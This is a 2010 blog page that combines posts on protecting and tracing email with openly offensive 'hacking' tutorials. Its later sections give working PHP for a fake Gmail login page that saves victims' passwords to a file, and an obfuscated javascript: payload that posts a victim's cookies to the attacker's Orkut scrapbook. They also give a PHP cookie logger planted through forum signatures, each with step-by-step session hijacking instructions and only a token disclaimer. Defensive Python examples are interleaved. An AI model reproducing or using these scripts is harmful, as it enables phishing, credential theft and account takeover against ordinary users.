Tuesday, December 28, 2010

How to Protect an Email Account from Being Hacked?



If this is the case, then what is the reason for many people to lose their accounts?

The answer is very simple: they don’t know how to protect themselves from being hacked. In fact, most people who lose their email accounts are not victims of hacking but victims of trapping. They lose their passwords not because expert hackers broke in, but because they were fooled into giving the password away themselves.

Are you confused? If so continue reading and you’ll come to know…

Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.

1. WEBSITE SPOOFING

Website spoofing is the act of creating a website with the intention of misleading its readers. The website is created by a different person or organisation (other than the original), specifically for the purpose of cheating. Normally, the website adopts the design of the target website and sometimes has a similar URL.

For example, a spoofed website of Yahoo.com appears exactly the same as the Yahoo website, so most people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this, the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, Orkut etc. Since the page resembles the original login page, people believe that it is genuine and give away their usernames and passwords by trying to log in to their accounts.

Solution:

* Never try to log in to your email account from any site other than the original site.
* Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
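
The "similar URL" point above can be checked mechanically before a link is followed. This is an added example, not part of the original post: it compares the host a link really points to against an allowlist. The allowlist contents and the sample links are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Assumed allowlist: the registrable domains you really log in to.
TRUSTED = ("yahoo.com", "google.com")

def check_login_url(url, trusted=TRUSTED):
    """Return (verdict, reason) for a link that claims to be a login page."""
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return "reject", "no hostname"
    if parts.scheme != "https":
        return "reject", "not https"
    if parts.username is not None:
        # In https://login.yahoo.com@other.host/ the browser goes to other.host.
        return "reject", "text before @ is not the host; real host is " + host
    if any(label.startswith("xn--") for label in host.split(".")):
        return "reject", "punycode label, possible look-alike characters"
    for domain in trusted:
        # Exact match or a true subdomain; "yahoo.com.x.example" does not pass.
        if host == domain or host.endswith("." + domain):
            return "ok", "host belongs to " + domain
    for domain in trusted:
        brand = domain.split(".")[0]
        if brand in host:
            return "reject", "'%s' appears in unrelated host %s" % (brand, host)
    return "reject", "host not on allowlist"

# Constructed sample links (example TLD and 203.0.113.0/24 are reserved).
SAMPLES = [
    "https://login.yahoo.com/",
    "http://login.yahoo.com/",
    "https://login.yahoo.com@203.0.113.9/",
    "https://yahoo.com.account-verify.example/login",
]

if __name__ == "__main__":
    for link in SAMPLES:
        print(link, "->", check_login_url(link))
```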

2. BY USING KEYLOGGERS

The other commonly used method to steal a password is a keylogger. A keylogger is a kind of spyware. The detailed description of a keylogger and its usage is discussed in the post Hacking an email account. If you read that post, you’ll see that it is all too easy to steal a password using a keylogger program. If you access your email account from a computer that has a keylogger installed, you will definitely lose your password, because the keylogger records each and every keystroke that you type.

Solution:

Protecting yourself from a keylogger scam is very easy. Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. There is also a program called Anti-keylogger, which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES

Do you access your email from cyber cafes? Then you are definitely at risk of losing your password. In fact, many people lose their email accounts in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password: he only needs to install a keylogger on his computers. When you log in to your email account from such a PC, you give away your password to the cafe owner. There are also many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.

This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.

So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked.

How To Trace an Email Address And Original Sender?

TRACING AN EMAIL ADDRESS

The purpose of this guide is to show the process involved in tracing an email. The first step in tracing an email is finding its headers. What are headers? Email headers are lines added at the top of an email message that are used by servers as the email travels en route to delivery. Generally, email clients show only the standard To, From, and Subject headers, but there are more.

1) Enabling Email Headers

Enabling Email Headers For Gmail

Step 1: Once logged into your Gmail account, open the email whose headers you want to view. Click on the “More Options” link in the message next to the date of the email.

Step 2: Now click the “Show Original” link.

Step 3: This link will pop up a new window with the headers and the body of the message.

Enabling Email Headers For Hotmail


Step 1: Once logged in, click on the "Options" link in the upper navigation bar.

Step 2: Now click on the "Mail Display Settings" link.

Step 3: Change the "Message Headers" option to "Full" and click OK.

Step 4: Go to your inbox and open any one of your emails. Your emails should now contain additional headers.



Enabling Email Headers For Yahoo

Step 1: Once logged in, click on the "Options" link in the upper navigation bar.

Step 2: Now click on the "General Preferences" link.

Step 3: In the paragraph titled "Messages", locate the "Headers" heading and select "All".

Step 4: Go to your inbox and open any one of your emails. Your emails should now contain additional headers.




2) Understanding Email Headers





In this example, the “Sender” located at sender@exampleuniversity.edu wants to send an email to “Receiver” located at receiver@exampleisp.com. The sender composes his email at his workstation in the university’s computer lab (lab.exampleuniversity.edu). Once completed, the email message is passed to the university’s mail server, called mail.exampleuniversity.com. The mail server, seeing that it has a message for receiver@exampleisp.com, contacts someisp.com mail server and delivers the email to it. The email is stored on someisp.com server until Receiver logs on to check his/her inbox.

In this example, four headers will be added to the email message. The first header is generated by the email client on lab.exampleuniversity.edu when forwarding the message to the mail server at mail.exampleuniversity.edu.

The following header is added when mail.exampleuniversity.edu transmits the message to mail.exampleisp.com.

The following header is added when mail.exampleisp.com stores the message on the server for Receiver.

The following header is added when Receiver downloads the email from a home machine called reciever.local.


3) Tracking The Original Sender

The easiest way to find the original sender is to look for the X-Originating-IP header. This header is important since it tells you the IP address of the computer that sent the email. If you cannot find the X-Originating-IP header, then you will have to sift through the Received headers to find the sender's IP.

Once the email sender's IP is found, go to http://www.arin.net/ to begin a search.



Now click on the "NET-24-16-0-0-1" link. 





Scroll down the page until you find the OrgAbuseEmail field.



Remember to include all the headers of the email along with an attached copy when filing a complaint.
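
The header walk from sections 2 and 3, as an added example that is not part of the original guide: it reads X-Originating-IP if present and otherwise walks the Received headers from oldest to newest, skipping internal addresses. Only the Received lines written by your own provider's servers are reliable, since a sender can write anything below them. The sample message is constructed from the guide's host names, with documentation-range IP addresses.

```python
import re
from email import message_from_string
from ipaddress import ip_address, ip_network

# Constructed message for the guide's lab -> university -> ISP scenario.
RAW = """\
Received: from mail.exampleuniversity.edu (mail.exampleuniversity.edu [198.51.100.25])
\tby mail.exampleisp.com with ESMTP id CONSTRUCTED2; Tue, 28 Dec 2010 10:00:05 -0500
Received: from lab.exampleuniversity.edu (lab.exampleuniversity.edu [203.0.113.77])
\tby mail.exampleuniversity.edu with ESMTP id CONSTRUCTED1; Tue, 28 Dec 2010 10:00:01 -0500
From: sender@exampleuniversity.edu
To: receiver@exampleisp.com
Subject: constructed sample

body
"""

# Addresses that identify no one outside the sender's own network.
INTERNAL = [ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
HOP = re.compile(r"from\s+(\S+).*?\[([0-9a-fA-F.:]+)\].*?\bby\s+(\S+)", re.S)

def hops(raw):
    """Return (from_host, ip, by_host) per Received header, oldest first."""
    msg = message_from_string(raw)
    found = []
    for header in reversed(msg.get_all("Received", [])):  # newest is on top
        m = HOP.search(header)
        if m:
            found.append(m.groups())
    return found

def origin_ip(raw):
    """Return (ip, source) for the best guess at the sending machine."""
    xoip = message_from_string(raw).get("X-Originating-IP")
    if xoip:
        return xoip.strip(" []"), "X-Originating-IP"
    for frm, ip, by in hops(raw):
        try:
            addr = ip_address(ip)
        except ValueError:
            continue  # bracketed text that is not an IP address
        if not any(addr in net for net in INTERNAL):
            return ip, "Received from %s by %s" % (frm, by)
    return None, "no usable header"

if __name__ == "__main__":
    print(origin_ip(RAW))
```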

Phishing with gmail !

Phishing:
This is the most common attack. In this attack, the attacker creates a fake page and sends it to the victim. The victim fills in the login information, and when he clicks on login, the information is sent to the attacker.
               The Method:
Here we will make a fake page for gmail.
-Go to http://www.gmail.com/ and save the home page.
-Rename it to index.html
-type the following script in notepad and save it in the same dictionary as gmail.php and create another text file and name it to passwd.txt



Header(“Location:
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcac
he=2 “);
$handle = fopen(“passwd.txt”, “a”);
Foreach($_GET as $variable => $value) {
 fwrite($handle, $variable);
 fwrite($handle, “=”);
 fwrite($handle, $value);
fwrite($handle, “rn”);
}     
Fwrite($handle, “rn”);
fclose($handle);
exit;
?>
-Edit the main gmail page in the notepad and press + F and type action and press “Find Next”.
You should see this:
-Change the link between''action=https://www.gmail.com/accounts/serviceloginAuth?service=mail'' to gmail.php.After this link you will see method=''post''
change it to method=''get''
-Save everything and upload it to a free hosting site make sure to give writing permission to passwd.txt
so now send the link to any one and when he fills everything then his username and password will get saved in passwd.txt so to view it you will have to type
http://www.yourwebsite.com/youraccount/list.txt. In your url.

These were some of the methods to crack a password. Other methods include compromising the website/computer...

New cookies stealing from mozilla firefox !!!

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

  • Firstly you need have Mozilla firefox.
  • Download cookie editor plugin for Mozilla firefox.
  • You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts
Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;

nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?

Action.submit';nobody.submit()
How to use cookies script?
1. Replace your number " UserId.value=33444211 "
How to Replace your Number ????
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg
It will be a Eight Digit Value.
3. Now replace your value with the value in the java script .
4. Now Your script will look like


javascript:nobody=replyForm;nobody.toUserId.value=yournumber;

nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));

nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

5. Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
6. You'll Get his cookie in your scrap book
7. After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
8. click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Scriptput ur eight digit number in the place of (33444211).

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.

Create a CookieLogger and Hack any Account!

What is a CookieLogger?
A CookieLogger is a script that is used to steal anybody’s cookies and store them in a log file, from where you can read the cookies of the victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.
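
Both cookie posts above depend on script being able to read the session cookie through document.cookie; a cookie set with the HttpOnly attribute is not exposed there. As an added example (not code from the original posts), this audits Set-Cookie response headers for that and related attributes. The sample headers are constructed, reusing only the phpBB cookie names quoted above.

```python
# Constructed Set-Cookie headers; values and attributes are made up.
SAMPLE = [
    "phpbb2mysql_sid=CONSTRUCTED; path=/",
    "phpbb2mysql_data=CONSTRUCTED; path=/; Secure",
    "session=CONSTRUCTED; Path=/; Secure; HttpOnly; SameSite=Lax",
]

def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, {attribute: value or True})."""
    first, *attrs = [part.strip() for part in header.split(";")]
    name, _, _value = first.partition("=")
    flags = {}
    for attr in attrs:
        if not attr:
            continue  # tolerate a trailing semicolon
        key, _, val = attr.partition("=")
        flags[key.strip().lower()] = val.strip() or True
    return name.strip(), flags

def audit(headers):
    """Return {cookie_name: [problems]} for cookies missing protections."""
    findings = {}
    for header in headers:
        name, flags = parse_set_cookie(header)
        problems = []
        if "httponly" not in flags:
            problems.append("readable via document.cookie (no HttpOnly)")
        if "secure" not in flags:
            problems.append("also sent over plain HTTP (no Secure)")
        if str(flags.get("samesite", "")).lower() not in ("lax", "strict"):
            problems.append("no SameSite=Lax or Strict")
        if problems:
            findings[name] = problems
    return findings

if __name__ == "__main__":
    for cookie, problems in audit(SAMPLE).items():
        print(cookie, "->", "; ".join(problems))
```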